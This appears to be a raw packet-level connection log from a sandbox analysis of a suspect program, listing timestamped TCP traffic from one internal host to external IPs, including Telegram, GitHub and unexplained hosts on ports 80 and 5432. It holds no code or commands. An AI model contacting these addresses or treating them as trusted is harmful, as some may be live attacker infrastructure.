                                                                                                                                                                              Oct 30, 2024 11:29:07.835783005 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:07.836179018 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:07.836199999 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:07.836250067 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:07.836256027 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:07.836281061 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:07.836292982 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:07.869785070 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:07.869803905 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:07.869894981 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:07.869900942 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:07.869947910 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:07.869992018 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:07.870003939 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:07.870054960 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:07.870060921 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:07.870111942 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:07.870332003 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:07.870346069 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:07.870404005 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:07.870409966 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:07.870455980 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:07.870569944 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:07.870584965 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:07.870630026 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:07.870635986 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:07.870671988 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:07.870768070 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:07.870781898 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:07.870831966 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:07.870836973 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:07.870877028 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:07.870943069 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:07.870955944 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:07.871000051 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:07.871005058 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:07.871041059 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:07.871331930 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:07.871346951 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:07.871390104 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:07.871396065 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:07.871419907 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:07.871433020 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:07.871639013 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:07.871654034 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:07.871704102 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:07.871710062 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:07.871747017 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:07.871782064 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:07.871794939 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:07.871835947 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:07.871840954 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:07.871877909 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:07.872606039 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:07.872621059 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:07.872665882 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:07.872672081 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:07.872723103 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:07.872996092 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:07.873009920 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:07.873064041 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:07.873075962 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:07.873119116 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:07.873306036 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:07.873322964 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:07.873377085 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:07.873389006 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:07.873436928 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:07.873616934 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:07.873634100 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:07.873684883 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:07.873691082 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:07.873728037 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:07.874485016 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:07.874500036 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:07.874552011 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:07.874557972 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:07.874588966 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:07.874594927 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:07.874608994 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:07.874628067 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:07.874649048 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:07.874655008 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:07.874691010 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:07.874691010 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:07.874758005 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:07.874772072 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:07.874819994 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:07.874825954 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:07.874864101 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:07.875070095 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:07.875085115 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:07.875125885 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:07.875132084 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:07.875169992 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:07.875649929 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:07.875663996 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:07.875718117 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:07.875724077 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:07.875761986 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:07.875813961 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:07.875863075 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:07.875869989 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:07.875885963 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:07.875907898 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:07.875936031 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:07.876343012 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:47.200107098 CET49885443192.168.2.5149.154.167.220
                                                                                                                                                                              Oct 30, 2024 11:29:47.200119019 CET44349885149.154.167.220192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:47.200448990 CET49885443192.168.2.5149.154.167.220
                                                                                                                                                                              Oct 30, 2024 11:29:47.203114033 CET49885443192.168.2.5149.154.167.220
                                                                                                                                                                              Oct 30, 2024 11:29:47.203130960 CET44349885149.154.167.220192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:48.050889015 CET44349885149.154.167.220192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:48.051001072 CET49885443192.168.2.5149.154.167.220
                                                                                                                                                                              Oct 30, 2024 11:29:48.055180073 CET49885443192.168.2.5149.154.167.220
                                                                                                                                                                              Oct 30, 2024 11:29:48.055197001 CET44349885149.154.167.220192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:48.055643082 CET44349885149.154.167.220192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:48.061311007 CET49885443192.168.2.5149.154.167.220
                                                                                                                                                                              Oct 30, 2024 11:29:48.107352972 CET44349885149.154.167.220192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:48.298835039 CET44349885149.154.167.220192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:48.301194906 CET49885443192.168.2.5149.154.167.220
                                                                                                                                                                              Oct 30, 2024 11:29:48.301211119 CET44349885149.154.167.220192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:48.562685013 CET44349885149.154.167.220192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:48.563512087 CET49885443192.168.2.5149.154.167.220
                                                                                                                                                                              Oct 30, 2024 11:29:48.563594103 CET44349885149.154.167.220192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:48.563750982 CET49885443192.168.2.5149.154.167.220
                                                                                                                                                                              Oct 30, 2024 11:29:58.430632114 CET499465432192.168.2.5188.116.21.204
                                                                                                                                                                              Oct 30, 2024 11:29:58.436098099 CET543249946188.116.21.204192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:58.436146021 CET499465432192.168.2.5188.116.21.204
                                                                                                                                                                              Oct 30, 2024 11:29:58.436783075 CET499465432192.168.2.5188.116.21.204
                                                                                                                                                                              Oct 30, 2024 11:29:58.442437887 CET543249946188.116.21.204192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:59.270421028 CET543249946188.116.21.204192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:59.282000065 CET499465432192.168.2.5188.116.21.204
                                                                                                                                                                              Oct 30, 2024 11:29:59.287327051 CET543249946188.116.21.204192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:59.528719902 CET543249946188.116.21.204192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:59.529479027 CET499465432192.168.2.5188.116.21.204
                                                                                                                                                                              Oct 30, 2024 11:29:59.534842968 CET543249946188.116.21.204192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:59.777195930 CET543249946188.116.21.204192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:59.777215004 CET543249946188.116.21.204192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:59.777468920 CET499465432192.168.2.5188.116.21.204
                                                                                                                                                                              Oct 30, 2024 11:29:59.779705048 CET499465432192.168.2.5188.116.21.204
                                                                                                                                                                              Oct 30, 2024 11:29:59.779800892 CET499465432192.168.2.5188.116.21.204
                                                                                                                                                                              Oct 30, 2024 11:29:59.785335064 CET543249946188.116.21.204192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:59.785350084 CET543249946188.116.21.204192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:30:00.024367094 CET543249946188.116.21.204192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:30:00.024601936 CET499465432192.168.2.5188.116.21.204
                                                                                                                                                                              Oct 30, 2024 11:30:00.030041933 CET543249946188.116.21.204192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:30:00.267945051 CET543249946188.116.21.204192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:30:00.275371075 CET499465432192.168.2.5188.116.21.204
                                                                                                                                                                              Oct 30, 2024 11:30:00.280843973 CET543249946188.116.21.204192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:30:00.522806883 CET543249946188.116.21.204192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:30:00.525969028 CET499465432192.168.2.5188.116.21.204
                                                                                                                                                                              Oct 30, 2024 11:30:00.531436920 CET543249946188.116.21.204192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:30:00.769577980 CET543249946188.116.21.204192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:30:00.770068884 CET499465432192.168.2.5188.116.21.204
                                                                                                                                                                              Oct 30, 2024 11:30:00.776063919 CET543249946188.116.21.204192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:30:01.015607119 CET543249946188.116.21.204192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:30:01.015688896 CET543249946188.116.21.204192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:30:01.015747070 CET499465432192.168.2.5188.116.21.204
                                                                                                                                                                              Oct 30, 2024 11:30:01.016942978 CET499465432192.168.2.5188.116.21.204
                                                                                                                                                                              Oct 30, 2024 11:30:01.022371054 CET543249946188.116.21.204192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:30:01.261991978 CET543249946188.116.21.204192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:30:01.262259007 CET499465432192.168.2.5188.116.21.204
                                                                                                                                                                              Oct 30, 2024 11:30:01.262289047 CET499465432192.168.2.5188.116.21.204
                                                                                                                                                                              Oct 30, 2024 11:30:01.262420893 CET499465432192.168.2.5188.116.21.204
                                                                                                                                                                              Oct 30, 2024 11:30:01.267796040 CET543249946188.116.21.204192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:30:01.267827988 CET543249946188.116.21.204192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:30:01.268150091 CET543249946188.116.21.204192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:30:01.268223047 CET499465432192.168.2.5188.116.21.204
                                                                                                                                                                              Oct 30, 2024 11:30:01.280236006 CET49965443192.168.2.534.117.59.81
                                                                                                                                                                              Oct 30, 2024 11:30:01.280258894 CET4434996534.117.59.81192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:30:01.280342102 CET49965443192.168.2.534.117.59.81
                                                                                                                                                                              Oct 30, 2024 11:30:01.289818048 CET49965443192.168.2.534.117.59.81
                                                                                                                                                                              Oct 30, 2024 11:30:01.289836884 CET4434996534.117.59.81192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:30:01.900703907 CET4434996534.117.59.81192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:30:01.900784969 CET49965443192.168.2.534.117.59.81
                                                                                                                                                                              Oct 30, 2024 11:30:01.908890009 CET49965443192.168.2.534.117.59.81
                                                                                                                                                                              Oct 30, 2024 11:30:01.908950090 CET4434996534.117.59.81192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:30:01.909013987 CET49965443192.168.2.534.117.59.81
                                                                                                                                                                              Oct 30, 2024 11:30:06.927360058 CET49985443192.168.2.534.117.59.81
                                                                                                                                                                              Oct 30, 2024 11:30:06.927448034 CET4434998534.117.59.81192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:30:06.927551031 CET49985443192.168.2.534.117.59.81
                                                                                                                                                                              Oct 30, 2024 11:30:06.927910089 CET49985443192.168.2.534.117.59.81
                                                                                                                                                                              Oct 30, 2024 11:30:06.927951097 CET4434998534.117.59.81192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:30:07.536546946 CET4434998534.117.59.81192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:30:07.536741018 CET49985443192.168.2.534.117.59.81
                                                                                                                                                                              Oct 30, 2024 11:30:07.538012981 CET49985443192.168.2.534.117.59.81
                                                                                                                                                                              Oct 30, 2024 11:30:07.538022041 CET4434998534.117.59.81192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:30:07.538820028 CET4434998534.117.59.81192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:30:07.540981054 CET49985443192.168.2.534.117.59.81
                                                                                                                                                                              Oct 30, 2024 11:30:07.583333969 CET4434998534.117.59.81192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:30:07.684190035 CET4434998534.117.59.81192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:30:07.684952021 CET4434998534.117.59.81192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:30:07.685028076 CET49985443192.168.2.534.117.59.81
                                                                                                                                                                              Oct 30, 2024 11:30:07.685228109 CET49985443192.168.2.534.117.59.81
                                                                                                                                                                              Oct 30, 2024 11:30:07.685240984 CET4434998534.117.59.81192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:30:07.685312033 CET49985443192.168.2.534.117.59.81
                                                                                                                                                                              Oct 30, 2024 11:30:07.685317993 CET4434998534.117.59.81192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:30:07.735069036 CET4998880192.168.2.5194.26.192.52
                                                                                                                                                                              Oct 30, 2024 11:30:07.740607023 CET8049988194.26.192.52192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:30:07.740804911 CET4998880192.168.2.5194.26.192.52
                                                                                                                                                                              Oct 30, 2024 11:30:07.740895987 CET4998880192.168.2.5194.26.192.52
                                                                                                                                                                              Oct 30, 2024 11:30:07.746742010 CET8049988194.26.192.52192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:30:08.594388008 CET8049988194.26.192.52192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:30:08.643270016 CET4998880192.168.2.5194.26.192.52
                                                                                                                                                                              Oct 30, 2024 11:30:13.596502066 CET4998880192.168.2.5194.26.192.52
                                                                                                                                                                              Oct 30, 2024 11:30:13.599028111 CET4999180192.168.2.5194.26.192.52
                                                                                                                                                                              Oct 30, 2024 11:30:13.604048014 CET8049988194.26.192.52192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:30:13.604105949 CET4998880192.168.2.5194.26.192.52
                                                                                                                                                                              Oct 30, 2024 11:30:13.605835915 CET8049991194.26.192.52192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:30:13.605909109 CET4999180192.168.2.5194.26.192.52
                                                                                                                                                                              Oct 30, 2024 11:30:13.606014967 CET4999180192.168.2.5194.26.192.52
                                                                                                                                                                              Oct 30, 2024 11:30:13.611382008 CET8049991194.26.192.52192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:30:14.420259953 CET8049991194.26.192.52192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:30:14.471307993 CET4999180192.168.2.5194.26.192.52
                                                                                                                                                                              Oct 30, 2024 11:30:19.863540888 CET49994443192.168.2.58.8.8.8
                                                                                                                                                                              Oct 30, 2024 11:30:19.863574028 CET443499948.8.8.8192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:30:19.863636971 CET49994443192.168.2.58.8.8.8
                                                                                                                                                                              Oct 30, 2024 11:30:19.864088058 CET49994443192.168.2.58.8.8.8
                                                                                                                                                                              Oct 30, 2024 11:30:19.864104033 CET443499948.8.8.8192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:30:20.476052046 CET443499948.8.8.8192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:30:20.476126909 CET49994443192.168.2.58.8.8.8
                                                                                                                                                                              Oct 30, 2024 11:30:20.477811098 CET49994443192.168.2.58.8.8.8
                                                                                                                                                                              Oct 30, 2024 11:30:20.477852106 CET443499948.8.8.8192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:30:20.477905035 CET49994443192.168.2.58.8.8.8
                                                                                                                                                                              Oct 30, 2024 11:30:25.489545107 CET49997443192.168.2.58.8.8.8
                                                                                                                                                                              Oct 30, 2024 11:30:25.489628077 CET443499978.8.8.8192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:30:25.489717007 CET49997443192.168.2.58.8.8.8
                                                                                                                                                                              Oct 30, 2024 11:30:25.490036011 CET49997443192.168.2.58.8.8.8
                                                                                                                                                                              Oct 30, 2024 11:30:25.490072012 CET443499978.8.8.8192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:30:26.111839056 CET443499978.8.8.8192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:30:26.111936092 CET49997443192.168.2.58.8.8.8
                                                                                                                                                                              Oct 30, 2024 11:30:26.113148928 CET49997443192.168.2.58.8.8.8
                                                                                                                                                                              Oct 30, 2024 11:30:26.113169909 CET443499978.8.8.8192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:30:26.113497972 CET443499978.8.8.8192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:30:26.113848925 CET49997443192.168.2.58.8.8.8
                                                                                                                                                                              Oct 30, 2024 11:30:26.155370951 CET443499978.8.8.8192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:30:26.292985916 CET443499978.8.8.8192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:30:26.294121981 CET443499978.8.8.8192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:30:26.294192076 CET49997443192.168.2.58.8.8.8
                                                                                                                                                                              Oct 30, 2024 11:30:26.294440985 CET49997443192.168.2.58.8.8.8
                                                                                                                                                                              Oct 30, 2024 11:30:26.294460058 CET443499978.8.8.8192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:30:26.294687986 CET4999180192.168.2.5194.26.192.52
                                                                                                                                                                              Oct 30, 2024 11:30:26.294985056 CET4999880192.168.2.5194.26.192.52
                                                                                                                                                                              Oct 30, 2024 11:30:26.300841093 CET8049991194.26.192.52192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:30:26.301029921 CET4999180192.168.2.5194.26.192.52
                                                                                                                                                                              Oct 30, 2024 11:30:26.302542925 CET8049998194.26.192.52192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:30:26.302642107 CET4999880192.168.2.5194.26.192.52
                                                                                                                                                                              Oct 30, 2024 11:30:26.302742004 CET4999880192.168.2.5194.26.192.52
                                                                                                                                                                              Oct 30, 2024 11:30:26.310627937 CET8049998194.26.192.52192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:30:27.129399061 CET8049998194.26.192.52192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:30:27.129785061 CET4999880192.168.2.5194.26.192.52
                                                                                                                                                                              Oct 30, 2024 11:30:27.135523081 CET8049998194.26.192.52192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:30:27.135603905 CET4999880192.168.2.5194.26.192.52
                                                                                                                                                                              Oct 30, 2024 11:30:37.193676949 CET50005443192.168.2.58.8.8.8
                                                                                                                                                                              Oct 30, 2024 11:30:37.193710089 CET443500058.8.8.8192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:30:37.193794012 CET50005443192.168.2.58.8.8.8
                                                                                                                                                                              Oct 30, 2024 11:30:37.194333076 CET50005443192.168.2.58.8.8.8
                                                                                                                                                                              Oct 30, 2024 11:30:37.194350004 CET443500058.8.8.8192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:30:37.833637953 CET443500058.8.8.8192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:30:37.833831072 CET50005443192.168.2.58.8.8.8
                                                                                                                                                                              Oct 30, 2024 11:30:37.834840059 CET50005443192.168.2.58.8.8.8
                                                                                                                                                                              Oct 30, 2024 11:30:37.834882021 CET443500058.8.8.8192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:30:37.834976912 CET50005443192.168.2.58.8.8.8
                                                                                                                                                                              Oct 30, 2024 11:30:42.855799913 CET50008443192.168.2.58.8.8.8
                                                                                                                                                                              Oct 30, 2024 11:30:42.855922937 CET443500088.8.8.8192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:30:42.856003046 CET50008443192.168.2.58.8.8.8
                                                                                                                                                                              Oct 30, 2024 11:30:42.856559038 CET50008443192.168.2.58.8.8.8
                                                                                                                                                                              Oct 30, 2024 11:30:42.856616020 CET443500088.8.8.8192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:30:43.508900881 CET443500088.8.8.8192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:30:43.509010077 CET50008443192.168.2.58.8.8.8
                                                                                                                                                                              Oct 30, 2024 11:30:43.510308981 CET50008443192.168.2.58.8.8.8
                                                                                                                                                                              Oct 30, 2024 11:30:43.510335922 CET443500088.8.8.8192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:30:43.510596037 CET443500088.8.8.8192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:30:43.510966063 CET50008443192.168.2.58.8.8.8
                                                                                                                                                                              Oct 30, 2024 11:30:43.555331945 CET443500088.8.8.8192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:30:43.686022043 CET443500088.8.8.8192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:30:43.687288046 CET443500088.8.8.8192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:30:43.687357903 CET50008443192.168.2.58.8.8.8
                                                                                                                                                                              Oct 30, 2024 11:30:43.687585115 CET50008443192.168.2.58.8.8.8
                                                                                                                                                                              Oct 30, 2024 11:30:43.687618971 CET443500088.8.8.8192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:30:43.699187040 CET50011443192.168.2.5140.82.121.4
                                                                                                                                                                              Oct 30, 2024 11:30:43.699280024 CET44350011140.82.121.4192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:30:43.699378967 CET50011443192.168.2.5140.82.121.4
                                                                                                                                                                              Oct 30, 2024 11:30:43.699690104 CET50011443192.168.2.5140.82.121.4
                                                                                                                                                                              Oct 30, 2024 11:30:43.699723959 CET44350011140.82.121.4192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:30:44.550371885 CET44350011140.82.121.4192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:30:44.550462961 CET50011443192.168.2.5140.82.121.4
                                                                                                                                                                              Oct 30, 2024 11:30:44.552892923 CET50011443192.168.2.5140.82.121.4
                                                                                                                                                                              Oct 30, 2024 11:30:44.553045034 CET44350011140.82.121.4192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:30:44.553122044 CET50011443192.168.2.5140.82.121.4
                                                                                                                                                                              Oct 30, 2024 11:30:49.569377899 CET50014443192.168.2.5140.82.121.4
                                                                                                                                                                              Oct 30, 2024 11:30:49.569480896 CET44350014140.82.121.4192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:30:49.569587946 CET50014443192.168.2.5140.82.121.4
                                                                                                                                                                              Oct 30, 2024 11:30:49.581235886 CET50014443192.168.2.5140.82.121.4
